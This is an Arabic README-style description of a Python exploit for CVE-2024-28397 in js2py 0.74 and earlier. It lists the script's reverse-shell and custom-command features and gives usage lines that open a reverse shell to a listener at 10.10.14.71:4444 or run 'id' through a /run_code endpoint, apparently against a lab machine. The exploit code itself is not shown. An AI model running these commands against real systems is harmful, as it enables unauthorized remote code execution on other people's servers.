
نص استغلال بلغة بايثون لثغرة CVE-2024-28397 التي تستهدف js2py <= v0.74. يدعم الـ reverse shell وتنفيذ أوامر مخصصة عبر endpoint HTTP.
الحمولة الافتراضية لـ reverse shell مع إمكانية تمرير أمر اختياري
الاستغلال يعمل مع js2py الإصدار v0.74 فأقل
requests (pip install requests)الـ Reverse shell:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
أمر مخصص:
python exploit.py 10.129.227.108 /run_code --cmd "id"